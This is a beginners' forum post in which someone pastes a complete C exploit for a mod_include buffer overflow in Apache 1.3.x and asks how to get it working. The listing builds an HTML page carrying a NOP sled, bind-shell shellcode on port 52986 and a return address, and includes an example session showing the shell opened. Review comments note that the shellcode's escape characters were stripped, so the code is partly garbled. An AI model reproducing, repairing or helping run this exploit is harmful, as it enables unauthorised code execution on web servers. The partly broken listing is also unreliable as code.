explotar vulnerabilidad con exploit en .c

editado febrero 2012 en Principiantes
Este es el código fuente:
	/*********************************************************************************
	 local exploit for mod_include of apache 1.3.x                                   *
	 written by xCrZx                         /18.10.2004/                           *
	 bug found by xCrZx                       /18.10.2004/                           *
	                                                                                 *
	 y0das old shao lin techniq ownz u :) remember my words                          *
	 http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
	                                                                                 *
	 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
	*********************************************************************************/
	
	/*********************************************************************************
	 Technical Details:                                                              *
	                                                                                 *
	 there is an overflow in get_tag function:                                       *
	                                                                                 *
	static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
	{                                                                                *
	...                                                                              *
	    term = c;                                                                    *
	    while (1) {                                                                  *
	        GET_CHAR(in, c, NULL, p);                                                *
	[1]        if (t - tag == tagbuf_len) {                                          *
	            *t = '\0';                                                         *
	            return NULL;                                                         *
	        }                                                                        *
	// Want to accept \" as a valid character within a string. //                   *
	        if (c == '\\') {                                                       *
	[2]            *(t++) = c;         // Add backslash //                           *
	            GET_CHAR(in, c, NULL, p);                                            *
	            if (c == term) {    // Only if //                                    *
	[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
	            }                                                                    *
	        }                                                                        *
	        else if (c == term) {                                                    *
	            break;                                                               *
	        }                                                                        *
	[4]        *(t++) = c;                                                           *
	    }                                                                            *
	    *t = '\0';                                                                 *
	...                                                                              *
	                                                                                 *
	as we can see there is a [1] check to determine the end of tag buffer,           *
	but it runs once per iteration and tests equality, while the backslash path      *
	can write two bytes ([2] then [4], when [3] does not fire): t - tag then steps   *
	from tagbuf_len-1 to tagbuf_len+1 and the == test never fires again.             *
	                                                                                 *
	So an attacker who can place a file in the served tree (hence 'local') can       *
	overflow the fixed-size buffer that tag points to and execute arbitrary code     *
	with the privileges of the httpd child process.                                  *
	                                                                                 *
	Fix:                                                                             *
	[1*]        if (t - tag >= tagbuf_len-1) {                                       *
	(review note: this guard alone still lets the loop advance t from tagbuf_len-2   *
	to tagbuf_len before it is re-tested, so the NUL store at [1] can land one       *
	byte past the buffer; keep a margin of two or re-check after [2])                *
	                                                                                 *
	Notes: mod_include must be active; with "XBitHack on" in httpd.conf, files       *
	with the execute bit set are parsed for SSI, hence the chmod +x in the example   *
	below.                                                                           *
	                                                                                 *
	*********************************************************************************/
	
	/*********************************************************************************
	  Example of work:                                                               *
	                                                                                 *
	  [[email protected] htdocs]# make 85mod_include                                    *
	  cc     85mod_include.c   -o 85mod_include                                      *
	  [[email protected] htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
	  [[email protected] htdocs]# chmod +x evil.html                                    *
	  [[email protected] htdocs]# netstat -na|grep 52986                                *
	  [[email protected] htdocs]# telnet localhost 8080                                 *
	  Trying 127.0.0.1...                                                            *
	  Connected to localhost.                                                        *
	  Escape character is '^]'.                                                      *
	  GET /evil.html HTTP/1.0                                                        *
	  ^]                                                                             *
	  telnet> q                                                                      *
	  Connection closed.                                                             *
	  [[email protected] htdocs]# netstat -na|grep 52986                                *
	  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
	  [[email protected] htdocs]#                                                       *
	*********************************************************************************/
	
	/*********************************************************************************
	  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always                  *
	*********************************************************************************/
	
	/*********************************************************************************
	  Personal hello to my parents :)                                                *
	*********************************************************************************/
	
	/*********************************************************************************
	 Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
	*********************************************************************************/
	
	
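	#include <stdio.h>     /* fprintf(), sprintf(), printf() */
	#include <stdlib.h>    /* strtoul(), exit() */
	#include <string.h>    /* strlen(), memcpy(), memset(): the original omitted this header and relied on implicit declarations */
	#include <fcntl.h>     /* not used by the code below; kept from the original */
	
	/* Length of the tag value the generator builds; main() fills evilbuf[EVILBUF+1] completely (see the note at its ret store). */
	#define EVILBUF 8202
	/* Headroom in html[] for the fixed markup of HTML_FORMAT around the %s. */
	#define HTMLTEXT 1000
	
	/*
	 * Page template. The %s receives the tag value as the argument of an SSI
	 * <!--#echo --> tag, which is what mod_include's get_tag() parses. As
	 * rendered on this page the literal had lost its backslashes (done="%s"
	 * and a bare n for each newline), which does not even compile; the quote
	 * and newline escapes are restored here. The text after the tag is the
	 * author's tag line and is emitted verbatim.
	 */
	#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"
	
	/* Banner printed to stderr by the usage message in main(); newline escapes restored as above. */
	#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"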
	
	
	/*
	 * Program entry point.
	 *
	 * Writes to stdout an HTML page whose <!--#echo --> tag value is a long
	 * string laid out as [NOP sled][shellcode][evilpad][ret]. The page is meant
	 * to be placed in a served directory (chmod +x, XBitHack on) and fetched over
	 * HTTP so that mod_include's get_tag() parses the oversized tag value; this
	 * is the get_tag overflow fixed in Apache 1.3.33 (CVE-2004-0940, from
	 * memory -- verify).
	 *
	 * argv[1]: return address as a hex string, parsed with strtoul base 16.
	 * Without it a usage line goes to stderr and the process exits with 0.
	 * Returns 0.
	 *
	 * NOTE(review): this copy of the listing lost its backslashes in transit.
	 * The shellcode below reads "x31xc0..." where the author wrote "\x31\xc0...",
	 * and the bare n in the usage string was "\n". As pasted, the string
	 * literals hold those ASCII characters, not the intended bytes; nothing has
	 * been reconstructed here. The length arithmetic further down does not
	 * depend on the shellcode length, which is why the program still produces
	 * output of the expected size.
	 */
	int main(int argc, char **argv) {
	
	    char html[EVILBUF+HTMLTEXT];    /* the page: fixed markup plus the tag value */
	    char evilbuf[EVILBUF+1];        /* the tag value; see the size note at the ret store below */
	
	    /* Payload. The commented-out block after it is an alternative. */
	    char shellcode[] =
	
	    /* Bind shell on TCP port 52986: the example session above shows that port
	     * in LISTEN after the request, and 0xcefa == 52986 matches the bytes
	     * "ce fa" in the second line. Escapes stripped in transit, see the header. */
	    "x31xc0"
	    "x31xdbx53x43x53x89xd8x40x50x89xe1xb0x66xcdx80x43"
	    "x66xc7x44x24x02xcexfaxd1x6cx24x04x6ax10x51x50x89"
	    "xe1xb0x66xcdx80x43x43xb0x66xcdx80x43x89x61x08xb0"
	    "x66xcdx80x93x31xc9xb1x03x49xb0x3fxcdx80x75xf9x68"
	    "x2fx73x68x20x68x2fx62x69x6ex88x4cx24x07x89xe3x51"
	    "x53x89xe1x31xd2xb0x0bxcdx80";
	
	    /* Alternative payload (disabled): execve of /tmp/sh, i.e. a program of
	     * your own placed at that path. Kept exactly as in the original. */
	   /*
	    "x31xc0x31xdbxb0x17xcdx80"
	    "xb0x2excdx80xebx15x5bx31"
	    "xc0x88x43x07x89x5bx08x89"
	    "x43x0cx8dx4bx08x31xd2xb0"
	    "x0bxcdx80xe8xe6xffxffxff"
	    "/tmp/sh";
	   */
	
	
	    char NOP[] = "x90x40";             /* sled unit; originally \x90 \x40 (nop / inc eax), so the sled is not a plain run of one byte */
	    char evilpad[] = "CRZCRZCRZCRZC";  /* 13 filler bytes between shellcode and ret; their purpose is not explained here -- TODO confirm */
	
	    int padding,xpad=0;            /* padding: number of 2-byte NOP units to emit; xpad: 0 or 1 extra single byte */
	    int i,fd;                      /* fd is never used */
	    long ret=0xbfff8688;           /* default return address, overridden by argv[1] */
	
	    /* NOTE(review): strtoul is not validated; a non-hex argument silently becomes 0. */
	    if(argc>1) ret=strtoul(argv[1],0,16);
	    else { fprintf(stderr,AUTHOR"nUsage: %s <RET ADDR> > file.htmlnn",argv[0]);exit(0); }
	
	    /* Sled length in bytes: EVILBUF - 3 - strlen(shellcode) - strlen(evilpad).
	     * Sled + shellcode + evilpad + 4 therefore always totals EVILBUF + 1,
	     * i.e. exactly sizeof evilbuf, whatever the shellcode length is. */
	    padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
	
	    /* Make the byte count even and halve it to get a count of 2-byte units;
	     * an odd count leaves xpad == 1 for one extra single byte. Runs at most twice. */
	    while(1) {
	        if(padding%2==0) { padding/=2; break;}
	        else {padding--;xpad++;}
	    }
	
	    memset(html,0x0,sizeof html);
	    memset(evilbuf,0x0,sizeof evilbuf);
	
	    /* Sled: 'padding' copies of the 2-byte NOP unit. */
	    for(i=0;i<padding;i++)
	        memcpy(evilbuf+strlen(evilbuf),&NOP,2);
	    /* Optional odd byte, chosen to differ from the byte before it so the alternation holds. */
	    for(i=0;i<xpad;i++)
	        memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);
	
	
	    /* sizeof includes each array's terminating NUL, so every append also
	     * writes a terminator and the next strlen() stops exactly there; each
	     * step overwrites the previous NUL. The order of these calls matters. */
	    memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
	    memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
	    /* Stores sizeof(long) bytes at the current end: 4 on the 32-bit target,
	     * 8 on LP64 hosts, where the last 4 land past the array. Even at 4 the
	     * store fills evilbuf[8199..8202] and overwrites the only NUL inside the
	     * array, so the %s below depends on the byte after the array being zero.
	     * NOTE(review): should be a memcpy of a 4-byte value into a buffer with
	     * one spare byte; the cast is also an unaligned, type-punning store. */
	    *(long*)&evilbuf[strlen(evilbuf)]=ret;
	
	    /* HTMLTEXT bytes of headroom cover HTML_FORMAT's fixed text; the %s
	     * argument is only as bounded as the terminator issue above allows. */
	    sprintf(html,HTML_FORMAT,evilbuf);
	
	    printf("%s",html);
	
	    return 0;
	}
	

Ya lo he compilado pero no sé cómo hacerlo funcionar.

Ayuda, por favor.
